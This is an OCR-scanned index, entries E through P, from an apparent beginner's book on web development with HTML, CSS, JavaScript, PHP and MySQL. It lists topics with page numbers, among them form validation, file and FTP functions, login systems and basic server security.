types of, 241-242 


Exception class, handling errors 
with, 419-420 

exchanging PHP data with other 
programs, 389-391 
exclamation point (!), 332-333 
exec function, 372, 375-376 
exec-pref ix=EPREFIX option, 
PHP, 45 

expose_php option, 428 
expressions for where clause, 
506-507 

Extensible Markup Language (XML), 
541, 550-553 

extensions for MySQL support, 71 
external JavaScript files, 190 
external style sheets, 128-129 
extract function, 302 

F 


F date format symbol, 308 
F12 Developer Tools, 264 
fatal errors, 311, 312 
Fedora, 23, 37 

feedback to form users, providing, 
565-568 

feof function, 387 
fgets statement, 387, 388, 391 
fields on web forms 
aligning with CSS, 180-183 
malicious attacks through, 429-430 
<fieldset> tag, 172 
file extensions, PHP, 19 
file function, 389, 391 
file handles, 384 
file management with PHP 
copying files, 368-369 
deleting files, 368-369 
getting information about files, 366 
moving files, 368-369 
overview, 366 
file modes, 380 
FILE privilege, 462 
file system, 366 
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File Transfer Protocol (FTP) 
directory listings, 380 
downloading files with, 380-382 
functions, 382-383 
logging in to server, 379 
overview, 378 

safe uploading with, 434-436 
support for, enabling, 45 
uploading files with, 380-382 
f ile_exists statement, 366 
f ile_get_contents function, 389 
f ile_uploads setting, 433 
f ileatime function, 367 
f ilectime function, 367 
f ilegroup function, 367 
f ilemtime function, 367 
filename extensions, verifying, 434 
filenames 

changing in Apache, 33 
default, 18 

f ileowner function, 367 
files. See also File Transfer Protocol 
(FTP) 

accessing text files, with PHP, 

384-386 

Apache configuration, 83-84 
binary, 23, 37, 58, 380 
closing text, 386 
comma-delimited, 389-391, 500 
copying into different 
directories, 368 
copying with PHP functions, 

368-369 

CSV, 389-391, 392-393 
default filenames, 18 
deleting with PHP functions, 

368-369 
.dll, 74 

DMG, installing MySQL on Macs from, 
62-63 

downloaded, verifying, 24-25, 

39, 59 

editing configuration, 82 
external JavaScript, 190 
file extensions, PHP, 19 


file management with PHP 
copying files, 368-369 
deleting files, 368-369 
getting information about files, 366 
moving files, 368-369 
overview, 366 
file modes, 380 

filename extensions, verifying, 434 
flat, PHP statements for 
accessing files, 384-386 
exchanging data in, 390 
overview, 383-384 
reading from, 387-390 
SQLite software, 394-395 
writing to, 386-387 
formats for image, 115 
getting information about with PHP 
functions, 366 

.htaccess, setting PHP options 
in, 636 

httpd. conf , 32, 47, 83-84 
include, 359 

installing MySQL from RPM files on 
Linux, 61-62 

listing in directories, 370-372 
modes for opening, 384 
moving with PHP functions, 

368- 369 
my.cnf , 84 

MySQL configuration, 65, 84 
organizing with PHP functions, 

369- 372 

password recovery process, 
creating, 625-626 
PHP configuration, 83 

php.ini 

disabling functions and classes, 
637-638 

editing, 50-51, 53, 83 
error display, changing, 639 
f ile_uploads setting, 433 
limiting file sizes in, 433 
location of, 83 

making changes outside of, 636 
overview, 635 
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files (continued) 

resource limits, changing, 639 
security options, setting in, 428 
session parameters, changing, 637 
session timeout, changing, 636-637 
troubleshooting PHP and MySQL 
connections, 73 
working with, 635 
prepended, starting sessions with, 
532-534 

preventing uploads to PHP, 433 
process files, building, 625-628 
reading into arrays, 388-389 
reset process, creating, 627-628 
specifying log files, 316 
tab-delimited, 391-393, 500 
test .php, 51-52 
TSV, 391-393 

uploading with FTP, 434-436 
validating, 433-434 
verifying downloaded, 24-25 
Zip, 37, 46 

filesize function, 367 
f iletype function, 367 
f ilter_var () function, 581-582, 585 
filtering jQuery selectors, 227 
final kejword, 418 
Firebug add-on 
debugging with, 266-268 
installing, 264-266 
overview, 264 
Firebug console, 266 
Firefox web browser, 264-268 
firewalls, 426 

flat files, PHP statements for 
accessing files, 384-386 
exchanging data in, 390 
overview, 383-384 
reading from, 387-390 
SQLite software, 394-395 
writing to, 386-387 
float CSS property, 160 
floating-point numbers, 288, 289-291 
FLUSH PRIVILEGES Statement, 466 
folders, 366 

font family, setting, 134-136 


font sizing methods, 136-137 
font-family property, 134-135 
fonts, styling with CSS 
color, setting, 138-140 
font family, setting, 134-136 
general discussion, 122-126 
overview, 11, 134 
size, setting, 136-138 
font-size CSS property, 136-137 
font-style property, 126 
font-weight property, 126 
f open () function, 434 
f open statement, 385 
for loops 
advanced, 337-339 
building, 336 

general discussion, 200-203 
nesting, 336-337 
overview, 335 

f oreach statement, 304-305, 306 
form events, 241, 242-247 
<form> tag, 95, 170, 172-173 
form validation. See also PHP 
validation 

adding to web form, 563-565, 
570-574 
basic, 557-561 
of check boxes, 579-580 
of drop-downs, 579-580 
e-mail addresses, 581-582 
feedback to form users, 565-568 
form validation process, 555-556 
HTML, 116-119 

HTML and CSS on forms, reviewing, 
561-562 

matching passwords, 582-584 
of numbers, 580-581 
overview, 555, 574-576 
of radio buttons, 579-580 
refining, 568-570 
of required fields, 576-579 
of text, 579 
of URLs, 582 

validation functions, creating, 
585-586 

of web forms, 246-247 
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format symbols for dates, 308-309 
formats for image files, 115 
formatting 
dates, 308 

numbers as dollar amounts, 291 
forms. See also validation 
aligning fields with CSS, 180-183 
checkboxes, creating, 176-177 
clearing, 180 

counting characters in text boxes, 
254-257 

creating with OOP, 414-415 
disabling form fields, 257-259 
drop-down boxes, adding, 174-176 
<form> tag, 172-173 
general discussion, 169-170 
input elements of, 170-172 
malicious attacks through, 429-432 
overview, 169 
radio buttons, 178-179 
submitting, 179-180 
text inputs, adding, 173-174 
unexpected input, handling, 

429-432 

forward slash (/), 327 
front slash (/), 197 
FTP (File Transfer Protocol) 
directory listings, 380 
downloading files with, 380-382 
functions, 382-383 
logging in to server, 379 
overview, 378 

safe uploading with, 434-436 
support for, enabling, 45 
uploading files with, 380-382 
f tp_cdup function, 382 
f tp_chdir function, 382 
f tp_close function, 382, 436 
f tp_connect function, 379, 382, 435 
f tp_delete function, 382 
f tp_exec function, 382 
f tp_fget function, 382 
f tp_fput function, 383 
f tp_get function, 380, 383, 436 
ftp_login function, 383, 435 


ftp_mdtm function, 383 
f tp_mkdir function, 383 
f tp_nlist function, 380, 383 
f tp_put function, 381, 383, 435 
ftp_pwd function, 383 
f tp_rename function, 383 
f tp_rmdir function, 383 
f tp_size function, 383 
f tp_sYstype function, 383 
function files, creating, 591-593 
function keyword, 204 
functions. See also specific functions by 
name 

accessing HTML with JavaScript, 211 
addNumbers, 205-207 
anonymous, 225 
arguments, adding, 204 
calling, 204-205 
creating, 204 
FTP, 382-383 
overview, 203-204 
returning results from, 207-208 
functions, PHP. See also specific 
functions by name 
built-in, 356 

code reuse through, 536-539 
creating, 347 
deprecated, 313 
disabling, 637-638 
error messages, 312 
file management, 365-369 
include files, placing in, 360 
for MySQL, 452 

organizing scripts with, 358-359 
overview, 319, 346 
passing values to, 349-354 
related to objects and classes, 
422-423 

returning values from, 354-356 
reusing code, 358 
for validation, 585-586 
variables, using in, 347-349 
for working with MySQL, 516 
functions, SQL, 504 
fwrite statement, 386 
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G date format symbol, 309 
g date format symbol, 309 
GET method, 172, 173, 548 
get_class_methods function, 422 
get_class_vars function, 422 
get_obj ect_vars function, 423 
_getDocTYpe method, 645 
getElementByld function, 211-214 
_getHead () method, 645 
_getHtmlOpen {) method, 645 
getTop () method, 644, 648 
global functions, 347 
global statement, 348-349 
Google, use of page titles, 93 
Google Maps, 188 
GRANT privilege, 462 
GRANT statements, 465, 466-467 
GRANT tables, 473 
GROUP BY, SELECT queries, 505 
grSecurity, 425 

H 


H date format symbol, 309 
h date format symbol, 309 
<hl> through <h6> tags, 95, 96 
hardening servers, 425-426 
hash values, 438 
HashCheck, 39 

head section, HTML documents, 
92-93 

<head> section of page, 643 
Hello World script, 274 
helper functions, automatically 
including, 531-535 
auto_prepend_f lie function, 
531-532 

classes, using for efficiency, 534-535 
overview, 531 

sessions, starting with prepended 
files, 532-534 
heredoc statement, 295 
hex codes, 137-138 


hiding elements with CSS, 161 
hinting, type, 406 
holding data 
in arrays, 195 
in variables, 193-195 
host table, 463 
hosting 

choosing hosts, 14-15 
for company websites, 15-16 
hosted websites, using, 18-19 
overview, 14 

web-hosting companies, choosing, 
16-18 

hostnames, 19, 460-461 
hover event handlers, 251-254 
hover () function, 253 
<hr> tag, 95 
href attribute, 108 
htdocs directory, 81 
HTML (HyperText Markup Language) 
block-level elements, 98 
comments, 101-102 
converting special characters to 
entities, 432 
creating pages, 97-98 
CSS styling, adding to page elements, 
122-126 

CSS targeting of elements, 130 
documents, 89-94 
escaping from, 272 
on forms, reviewing, 561-562 
general discussion, 10-11 
images, adding, 113-116 
include files, placing in, 359 
inline elements, 98 
inserting text in pages, 95-96 
JavaScript, working with, 189-190, 
210-214 

jQuery, working with, 227-232 
line breaks, inserting, 99-101 
links, adding, 108-112 
lists, adding, 102-105 
output on web pages, 
troubleshooting, 53 
overview, 89 

PHP logic, separating from, 357-358 
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semantic markup, 95 
spaces, inserting, 99-101 
tables, 102-103, 105-108 
tags, 94-95, 103 
validating, 116-119 
HTML5 document type, 90 
htmlentities () function, 432 
HTTP (HyperText Transfer Protocol), 
8-9, 548 

httpd. conf file, 32, 47, 83-84 
HyperText Markup Language (HTML) 
block-level elements, 98 
comments, 101-102 
converting special characters to 
entities, 432 
creating pages, 97-98 
CSS styling, adding to page elements, 
122-126 

CSS targeting of elements, 130 
documents, 89-94 
escaping from, 272 
on forms, reviewing, 561-562 
general discussion, 10-11 
images, adding, 113-116 
include files, placing in, 359 
inline elements, 98 
inserting text in pages, 95-96 
JavaScript, working with, 189-190, 
210-214 

jQuery, working with, 227-232 
line breaks, inserting, 99-101 
links, adding, 108-112 
lists, adding, 102-105 
output on web pages, 
troubleshooting, 53 
overview, 89 

PHP logic, separating from, 357-358 
semantic markup, 95 
spaces, inserting, 99-101 
tables, 102-103, 105-108 
tags, 94-95, 103 
validating, 116-119 
HyperText Transfer Protocol (HTTP), 
8-9, 548 
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i date format symbol, 309 
i++ (postfix operator), 201 
icon. Firebug, 266 
icons, used in book, 3 
id attribute, 177, 182 
id selector, 130-131 
identical operator (===), 421-422 
if statements 
building, 330-332 
complex statements, 277 
negating, 332-333 
nesting, 333 
overview, 329, 330 
Its (Internet Information Services), 
Microsoft, 8, 19, 25, 48-49, 273 
images 

adding to background, 150-154 
changing with jQuery, 234-237 
file size, 114 
formats, 115 

inserting in pages, 113-116 
<img> tag, 95, 113-114 
include files 

external text files, bringing into 
script, 360-361 

include directories, setting up, 363 
include statements, types of, 360 
overview, 359-360 
PHP tags in, 361 
secure storage for, 361-362 
variables, using in, 361 
include statements, types of, 360 
include_once statements, 360-361 
increment Statement, 336 
indentation 
in HTML, 102 
in PHP code, 277-278 
indexes, 203 
infinite loops 
avoiding, 343-344 
with while loops, 341 
inf odir=DIR option, PHP, 45 
inheritance, 400 
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ini_get () function, 636 
ini_set () function, 636 
initUser function, 610 
inline CSS, 122-126 
inline elements, 98 
inner joints, 510 
in-page anchors. 111 
input data, accepting in web services, 
548-553 

input elements of, 170-172 
<input> tag, 95 
INSERT privilege, 462 
INSERT statement, 499, 602 
inserting 

line breaks, in pages, 99-101 
spaces, in pages, 99-101 
text in HTML pages, 95-96 
installation kit, XAMPP 
Control Panel, using, 78-79 
installing, 76-78 
obtaining, 75-76 
overview, 24, 38, 59, 75 
reinstalling, 84-85 
testing, 79-82 
troubleshooting, 85 
uninstalling, 84-85 
installation kits 
for Apache, 24 
for MySQL, 59 
for PHP, 38-39 
Installation Type screen, 26 
installing 
Apache, 25-28 
Firebug add-on, 264-266 
jQuery, 220-221 
MySQL, 20, 59-65 
PHP, 20, 40-46 

web servers, on local computers, 
19-20 

XAMPP installation kit, 76-78 
instanceof operator, 423 
instantiation, 398, 402, 413 
INT data type, 483 
integer data type, 288, 289-291 
interfaces, 417-418 


internal style sheets, 126-128 
Internet Explorer 
F12 Developer Tools, 264 
JavaScript support, 188 
Internet Information Services (IIS), 
Microsoft, 8, 19, 25, 48-49, 273 
Internet Protocol (IP) addresses 
general discussion, 9 
as hostnames, 460 
is_dir function, 367 
is_executable function, 367 
is_f ile function, 367 
is_readable function, 367 
is_writable function, 367 
isLoggedIn property, 612-613, 
614-618 

isNaN () function, 206 
iteration 

with foreach statement, 304-305 
manual, 303-304 
multidimensional arrays, 306 
overview, 302-303 

7 

j date format symbol, 308 
Java, 12, 187-188 
JavaScript. See also jQuery 
alerts, sending to screen, 191-193 
arrays, holding multiple values 
in, 195 

benefits of, 188 
comments, adding, 193 
conditionals, 197-200 
debugging with Firebug add-on, 
266-268 
events 

form, 242-247 

hover event handler, adding, 
251-254 

keyboard, 254-259 
mouse click event handler, adding, 
247-251 
overview, 241 
types of, 241-242 
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external, 190 
functions, 203-208 
general discussion, 11-12 
HTML, working with, 189-190, 
210-214 

Java versus, 187-188 
JavaScript tag, adding to 
pages, 189 

for login pages, 606-607 
looping, 200-203 
numbers, working with, 196-197 
objects, 208-210 
overview, 187, 191 
password recovery pages, building, 
621-622 

for registration pages, 596-597 
strings, keeping track of words with, 
195-196 

troubleshooting 
alerts, 191-193, 262 
comments, 262-264 
Firebug add-on, 264-268 
overview, 261 
validation 

adding to web form, 563-565, 
570-574 
basic, 557-561 

feedback to form users, 565-568 
HTML and CSS on forms, reviewing, 
561-562 
overview, 556 
refining, 568-570 

variables, holding data in, 193-195 
web browsers, working with, 

214-217 

JavaScript Object Notation (JSON), 
541, 542-545, 551-553 
JavaScript tag, adding to pages, 189 
JavaScript validation 
adding to web form, 563-565, 
570-574 
basic, 557-561 

feedback to form users, 565-568 
HTML and CSS on forms, reviewing, 
561-562 


overview, 556 
refining, 568-570 
JOIN query, 510-513 
joining multiple comparisons, 
327-329 

joining strings, 196, 294 
j Query See also events 
CDN-hosted, adding to pages, 
222-223 

CSS, changing, 237-240 
general discussion, 219-220 
HTML, working with, 227-232 
HTML attributes, setting, 232-237 
installing, 220-221 
local, adding to pages, 221-222 
overview, 214, 219 
ready () function, 223-225 
selecting elements with, 225-227 
JSON (JavaScript Object Notation), 
541, 542-545, 551-553 
j son_decode () PHP function, 
544-545 

K 


keyboard events 

counting characters in text boxes, 
254-257 
overview, 241 

preventing character input, 257-259 
key/value pairs, 297 
keywords 

DISTINCT, 505, 508 
E_ERROR, 312 
final, 418 
function, 204 
LIMIT, 505, 508 
private, 404 
protected, 404 
public, 404 
return, 207 
var, 193-194 
krsort function, 301 
ksort function, 301 
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1 date format symbol, 309 
<label> tag, 172 
language options, XAMPP web 
page, 80 

<legend> tag, 172 
length property, 202 
<li>tag, 103 
LIMIT kejword, 505, 508 
line breaks, inserting in pages, 
99-101 

line numbers in script, 311 
lines, separating in PHP code, 
280-281 

<link;> tag, 95, 128-129 
links 

absolute versus relative. 111 
adding to page, 108-109 
opening in new windows, 112 
to other pages, creating, 109-110 
overview, 108 

within pages, creating, 111-112 
password recovery page, adding 
to, 621 
Linux 

activating MySQL support, 71-72 
Apache, installing on, 19 
backing up databases on, 469-471 
case sensitivity with SQL, 452 
checking for MySQL on, 56 
checking for PHP installation on, 36 
configuring Apache for PHP, 49 
controlling MySQL server, 67 
getting Apache information on, 31 
installing Apache from source code 
on,27-28 

installing MySQL from RPM files, 
61-62 

installing MySQL on, 20 
installing PHP on, 40-42, 44-45 
obtaining Apache for, 23-24 
obtaining MySQL for, 58-59 
obtaining PHP for, 37-38 
PHP, installing on, 20 


restarting Apache on, 30 
starting Apache on, 29-30 
starting MySQL on, 57 
stopping Apache on, 30 
text editors, 97 

troubleshooting PHP and MySQL 
connections, 73 
list function, 302 
lists 

creating in HTML, 102-105 
of directory files, creating, 370-372 
styles, 144-147 
list-style-type CSS 
properties, 144 
literal characters, 323-326 
LOAD DATA INFILE Statement, 501 
LOAD statement, 498-502 
local jQuery, adding to pages, 
221-222 

local time, setting, 307-308 
local variables, 347 
location object, 216-217 
location options, configure 
command, 43 

log out pages, building, 614-618 
log_errors option, 428 
logging in to FTP server, 379 
logging PHP error messages, 315-316 
logic code, separating from display 
code,357-358 
login applications 
authenticated pages, adding, 
612-618 

e-mail functionality 
class methods, building, 628-632 
overview, 618-619 
password recovery page, building, 
619-622 

password reset database, 
building, 619 

password reset page, building, 
623-625 

process files, building, 625-628 
success page, building, 

622-623, 625 
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function files, creating, 591-593 
general discussion, 588 
login pages, building, 604-607 
overview, 587 

success pages, building, 602-604 
user database, creating, 589-591 
User objects, creating, 607-611 
web forms, creating, 593-602 
login names, 460 
login pages, 523-524, 604-607 
long strings, storing, 295 
loops 

breaking out of, 344-346 
do. .while loops, 341-342 
each () loops, 230 
for, 200-203, 335-339 
infinite, avoiding, 343-344 
overview, 200, 319, 335 
while loops, 203, 338-341 

M 


M date format symbol, 308 
m date format symbol, 308 
Macs 

activating MySQL support, 71-72 
Apache, installing on, 19 
backing up databases on, 469-471 
checking for MySQL on, 56 
checking for PHP installation 
on, 36 

configuring Apache for PHP, 49 
controlling MySQL server, 67 
getting Apache information on, 31 
installing Apache on, 27-28 
installing MySQL from DMG files, 
62-63 

installing MySQL on, 20 
installing PHP on, 20, 42-45 
obtaining Apache for, 24 
obtaining MySQL for, 59 
obtaining PHP for, 38 
restarting Apache on, 30 
starting Apache on, 29-30 
stopping Apache on, 30 


text editors, 97 

troubleshooting PHP and MySQL 
connections, 73 
magic quotes feature, 525-526 
mail () function, 630 
maintainance of PHP scripts, 357 
make command, 28 
malicious attacks, 429-432, 433 
MAMP installation kit, 24, 39 
mandir=DIR option, PHP, 45 
manually shutting down MySQL 
server, 67 

manually traversing arrays, 303-304 
margin CSS property, 157, 158 
markup, semantic, 11, 95 
master class, 400 

mathematical operations on database 
columns, 503 

max_execution_time directive, 639 
maxCharacters variable, 256 
maxsize attribute, 173 
MD5 signatures, 39 
members-only websites 
authenticated pages, adding, 

612-618 

e-mail functionality 
class methods, building, 628-632 
overview, 618-619 
password recovery page, building, 
619-622 

password reset database, 
building, 619 

password reset page, building, 
623-625 

process files, building, 625-628 
success page, building, 

622-623, 625 

function files, creating, 591-593 
general discussion, 588 
login pages, building, 604-607 
overview, 587 

success pages, building, 602-604 
user database, creating, 589-591 
User objects, creating, 607-611 
web forms, creating, 593-602 
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memory_limit directive, 639 
meta elements, 93 
method attribute, 172 
methods. See also specific methods by 
name 

abstract, 415-418 
adding to classes, 405-407 
choosing for OOP scripts, 401-402 
class, building, 628-632 

_clone, 420-421 

_construct, 410 

constructor, writing, 409-410 

_destruct, 423-424 

emailPass, 628-630 
GET, 172, 173, 548 
_getDocTYpe, 645 
_getHead {), 645 
_getHtmlOpen (), 645 
getTop (), 644, 648 
overview, 399-400 
POST, 172, 173, 548 
preventing changes to, 418 
private, 407-409, 632 
public, 407-409 
_resetPass, 632 
validateReset {), 630-631 
mice 

click event handler, adding, 247-251 
hover event handler, adding, 
251-254 
overview, 241 

Microsoft Internet Information 

Services (IIS), 8, 19, 25, 48-49, 273 
Microsoft Virtual PC for Application 
Compatibility software, 122 
Microsoft Windows. See also XAMPP 
installation kit 

activating MySQL support, 71 
Apache, installing on, 19 
backing up databases on, 469 
checking for MySQL on, 56 
checking for PHP installation on, 36 
configuring web server for PHP, 
47-48 

controlling MySQL server, 66-67 
getting Apache information on, 31 


installing Apache on, 25-26 
installing MySQL on, 20 
installing PHP on, 20, 46 
MySQL Setup Wizard, running on, 
60-61 

obtaining Apache for, 23 
obtaining MySQL for, 58 
obtaining PHP for, 37 
starting and stopping Apache on, 
28-29 

starting MySQL on, 57 
text editors, 97 

troubleshooting PHP and MySQL 
connections, 73, 74 
minus sign (-), 197, 290 
mkdir function, 369-370 
mobile devices, 10 
mod_security, 427 
mod_so module, 40, 42 
modes for opening files, 384 
modulus {%) sign, 290 
mouse events 

click event handler, adding, 247-251 
hover event handler, adding, 
251-254 
overview, 241 

moving files with PHP functions, 
368-369 

multidimensional arrays, 305-306 
multidine comments, 263 
multiple comparisons, joining, 
327-329 

multiple inheritance, 400 
multiple_querY function, 520 
multiplication, 197 
multiplication (*) sign, 290 
my. cnf file, 84 
MySQL 
accounts 
adding, 465 

administrator responsibilities 
regarding, 458 
attributes of, 459 
names of, 460-461 
overview, 455, 462, 464 
passwords, 461, 465-466 
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privileges, 461-462, 466-467 
removing, 467-468 
viewing information about, 464 
activating support for, 71-72 
administration program for, 70 
administrator responsibilities, 
457-458 

backing up databases, 468-471 
checking for installation of, 55-56 
communicating with, 450-454 
configuring, 65, 84 
controlling access to data, 459-462 
controlling server, 66-67 
database structure, 450 
default root account, 458 
downloading, 58 

errors, handling with PHP, 522-523 
function of, 449-450 
general discussion, 12-13 
installing, 20, 59-65 
location of databases, 19 
mysqli functions, 523-526 
mysqli functions, converting to 
mysql functions, 526-527 
obtaining, 57-59 
overview, 449, 457 
PHP communication with, 516-521 
PHP scripts, working with, 515-516 
protecting databases, 454-455 
provided by web-hosting 
companies, 16 
restoring data, 471-473 
running as service, 85 
selecting databases with PHP, 521 
server, connecting to, 517-519 
SQL statements, sending to 
server, 519 
starting, 56-57 
testing, 68-69 

troubleshooting connections with 
PHP, 73-74 

troubleshooting installation, 69-70 
upgrading, 473 

XAMPP Control Panel, starting and 
stopping with, 78-79 


mysql client, 68-69, 452, 453 
mysql database, 463, 464 
mysql extension, 71 
mysql functions 
converting mysqli functions to, 
526-527 
overview, 516 

selecting databases with, 521 
MySQL server, 449-450 
MySQL Setup Wizard, running on 
Windows, 60-61 

MySQL website, downloading software 
from, 58 

MySQL Workbench, 70 
mysql_select_db function, 521 
mysql_upgrade script, 473 
mysqladmin utility, 67 
mysqldump utility program, 469 
mysqli extension, 71 
mysqli functions 
converting to mysql functions, 
526-527 

error messages, handling, 522-523 
overview, 516 
types of, 523-526 
mysqli_affected_rows 
function, 525 

mysqli_connect function, 517-518 
mysqli_error function, 522-523 
mysqli_insert_id function, 524 
mysqli_num_rows function, 523-524 
mysqli_query () function, 522 
mysqli_real_escape_string 
function, 526 

mysqli_real_escape_string() 

function, 602 

mysqli_select_db function, 521 
myVariable variable, 194 

N 


n date format symbol, 308 
name attribute, 112, 177, 178 
names of accounts, MySQL, 460-461 
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naming 

PHP constants, 288 
PHP functions, 359 
PHP variables, 282 
variables, 195 

navigator object, 214-215 
negating if statements, 332-333 
nesting 

foreach statements, 306 
if statements, 333 
queries, 503 

Net Panel, Firebug add-on, 267 

next statement, 303 

none list style, 144, 146-147 

Notepad, 97 

notices, 311, 313 

NULL data type, 288, 296 

nuraber_format Statement, 291 

numbering of script lines, 311 

numbers 

comparing values in PHP, 321 
PHP validation of, 580-581 
working with in JavaScript, 196-197 
numeric data types 
arithmetic operations on, 289 
arithmetic operators, 290-291 
formatting numbers as dollar 
amounts, 291 

numerical data, storing, 482 

0 


object data types, 288 
object-oriented programming (OOP). 
See also classes 
abstract methods, 415-418 
classes, 398-399, 413-415 
code reuse through, 539 
comparing objects, 421-422 
copying objects, 420-421 
destroying objects, 423-424 
developing scripts, 400-402 
errors, handling with Exception 
class, 419-420 


functions related to objects and 
classes, 422-423 
inheritance, 400 
methods, 399-400 
objects, 398-399 
overview, 397-398 
preventing changes to classes or 
methods, 418 
properties, 399 
objects 

choosing for OOP scripts, 401-402 
comparing, 421-422 
copying, 420-421 
creating, 208-209, 413 
creating and using in OOP scripts, 402 
destroying, 423-424 
getting information about, 422-423 
overview, 208, 398-399 
properties, adding to, 209-210 
offsite storage of database 
backups, 468 
<ol> tag, 103 
on () function, 255 
OOP (object-oriented programming). 
See also classes 
abstract methods, 415-418 
classes, 398-399, 413-415 
code reuse through,539 
comparing objects, 421-422 
copying objects, 420-421 
destroying objects, 423-424 
developing scripts, 400-402 
errors, handling with Exception 
class, 419-420 

functions related to objects and 
classes, 422-423 
inheritance, 400 
methods, 399-400 
objects, 398-399 
overview, 397-398 
preventing changes to classes or 
methods, 418 
properties, 399 
open_basedir option, 428 
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opendir statement, 370-372 
opening files, modes for, 384 
opening tags, 91 
operating system commands 
backticks, 373-374 
error messages, accessing with, 
376-377 

exec function, 375-376 
overview, 372-373 
passthru function, 376 
security issues, 377-378 
system function, 374-375 
operating systems 
Linux 

activating MySQL support, 71-72 
Apache, installing on, 19 
backing up databases on, 469-471 
case sensitivity with SQL, 452 
checking for MySQL on, 56 
checking for PHP installation on, 36 
configuring Apache for PHP, 49 
controlling MySQL server, 67 
getting Apache information on, 31 
installing Apache from source code 
on,27-28 

installing MySQL from RPM files, 
61-62 

installing MySQL on, 20 
installing PHP on, 40-42, 44-45 
obtaining Apache for, 23-24 
obtaining MySQL for, 58-59 
obtaining PHP for, 37-38 
PHP, installing on, 20 
restarting Apache on, 30 
starting Apache on, 29-30 
starting MySQL on, 57 
stopping Apache on, 30 
text editors, 97 

troubleshooting PHP and MySQL 
connections, 73 
Macs 

activating MySQL support, 71-72 
Apache, installing on, 19 
backing up databases on, 469-471 


checking for MySQL on, 56 
checking for PHP installation on, 36 
configuring Apache for PHP, 49 
controlling MySQL server, 67 
getting Apache information on, 31 
installing Apache on, 27-28 
installing MySQL from DMG files, 
62-63 

installing MySQL on, 20 
installing PHP on, 20, 42-45 
obtaining Apache for, 24 
obtaining MySQL for, 59 
obtaining PHP for, 38 
restarting Apache on, 30 
starting Apache on, 29-30 
stopping Apache on, 30 
text editors, 97 

troubleshooting PHP and MySQL 
connections, 73 
Unix 

backing up databases on, 469-471 
case sensitivity with SQL, 452 
checking for MySQL on, 56 
checking for PHP installation on, 36 
getting Apache information on, 31 
installing PHP on, 40-42, 44-45 
obtaining MySQL for, 58-59 
restarting Apache on, 30 
starting Apache on, 29-30 
stopping Apache on, 30 
Windows 

activating MySQL support, 71 
Apache, installing on, 19 
backing up databases on, 469 
checking for MySQL on, 56 
checking for PHP installation on, 36 
configuring web server for PHP, 
47-48 

controlling MySQL server, 66-67 
getting Apache information on, 31 
installing Apache on, 25-26 
installing MySQL on, 20 
installing PHP on, 20, 46 
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operating systems (continued) 

MySQL Setup Wizard, running on, 
60-61 

obtaining Apache for, 23 
obtaining MySQL for, 58 
obtaining PHP for, 37 
starting and stopping Apache on, 
28-29 

starting MySQL on, 57 
text editors, 97 

troubleshooting PHP and MySQL 
connections, 73, 74 
operating systems, PHP tasks on 
exchanging data with other 
programs, 389-391 
file management, 365-369 
FTP, 378-383 

operating system commands, 
372-378 

organizing files, 369-372 
overview, 365 

reading and writing text files, 
383-389 

SQLite software, 394-395 
or, in comparisons, 327-329 
order, retrieving database data 
in,505 

ORDER BY, SELECT queries, 505 
order for passing values to 
functions, 351 
ordered lists, 103, 104-105 
organizing 

data in databases, 477-480 
files with PHP functions, 369-372 
organizing PHP scripts 
display code, separating from logic 
code,357-358 
with functions, 358-359 
with include files, 359-363 
overview, 357 
reusing code, 358 
outer joints, 510 


P 


<p> tag, 95, 96 
padding, 143-144, 158 
Page class, 642-643 
page events, 241 
page layouts, CSS 
overview, 155 

single-column layout, creating, 
155-158 

two-column layout, creating, 
159-162 

paid access to websites, 587 
panels, enabling in Firebug 
add-on, 267 

parent classes, 400, 415-417 
parentheses 

using with arithmetic operators, 
290-291 

using with comparisons, 329 
parse errors, 311 
passing values to PHP functions 
number of, 351-352 
order of, 351 
overview, 349-350 
by reference, 353-354 
types of values, 350-351 
passthru function, 372, 376 
password recovery e-mail success 
page, 622-623 

password recovery pages, building, 
619-622 

password recovery process file, 
creating, 625-626 
password reset database, 
building, 619 

password reset pages, building, 
623-625 
passwords 

MySQL accounts, 461, 465-466 
PHP validation of, 582-584 
root account, 458 
pathinf o {) function, 368 
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paths, changing in Apache, 33 
pattern matching with regular 
expressions, 323-327 
percentages, font sizing by, 136-137 
periods (.), 132 
Perl-compatible regular 
expressions, 323 

permissions, MySQL accounts, 455 
■php extension, 272 
PHP functions. See also specific 
functions by name 
built-in, 356 

code reuse through, 536-539 
creating, 347 
deprecated, 313 
disabling, 637-638 
error messages, 312 
file management, 365-369 
include files, placing in, 360 
for MySQL, 452 

organizing scripts with, 358-359 
overview, 319, 346 
passing values to, 349-354 
related to objects and classes, 
422-423 

returning values from, 354-356 
reusing code, 358 
for validation, 585-586 
variables, using in, 347-349 
for working with MySQL, 516 
PHP HyperText Preprocessor (PHP). 
See also data types; object- 
oriented programming 
Apache, securing, 426-427 
arrays 

$_SESS10N, 438 
creating, 296-297 
getting values from, 301-302 
holding multiple values in, 195 
for loops, 202-203 
multidimensional, 305-306 
overview, 288, 296 
reading files into, 388-389 


removing values from, 299 
sorting, 299-301 
viewing, 298-299 
walking through values in, 
302-305 

checking for installation, 36 
comments, adding to script, 
316-318 

configuring, 50-51, 83 
configuring for MySQL support, 71 
configuring web server for, 47-49 
constants, 287-288 
cookies, 438-440 
dates and times, 307-310 
displaying content on web pages, 
278-281 

error messages, 310-316 
file extensions, 19 
general discussion, 12-13, 

271-273 

helper functions, automatically 
including, 531-535 
installing, 20, 35, 40-46 
obtaining, 36-39 
OOP. See also classes 
abstract methods, 415-418 
classes, 398-399, 413-415 
code reuse through, 539 
comparing objects, 421-422 
copying objects, 420-421 
destroying objects, 423-424 
developing scripts, 400-402 
errors, handling with Exception 
class, 419-420 

functions related to objects and 
classes, 422-423 
inheritance, 400 
methods, 399-400 
objects, 398-399 
overview, 397-398 
preventing changes to classes or 
methods, 418 
properties, 399 
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PHP HyperText Preprocessor (PHP) 

(continued) 

operating systems tasks 
exchanging data with other 
programs, 389-391 
file management, 365-369 
FTP, 378-383 

operating system commands, 
372-378 

organizing files, 369-372 
overview, 365 

reading and writing text files, 
383-389 

SQLite software, 394-395 
overview, 271, 531 
provided by web-hosting 
companies, 16 

registration-process pages, 598-602 
reusing code, 535-539 
sanitizing variables, 432-436 
securing servers, 425-426 
security options, setting in 
php. ini, 428 
sessions, 437-438, 440-446 
structure of, 273-275 
PHP HyperText Preprocessor (PHP) 
syntax, 275-277 
templates, 642-650 
testing, 51-52, 81-82 
troubleshooting connections with 
MySQL, 73-74 

troubleshooting installation of, 53 
unexpected input, handling, 
429-432 
validation 

of check boxes, 579-580 
of drop-downs, 579-580 
e-mail addresses, 581-582 
matching passwords, 582-584 
of numbers, 580-581 
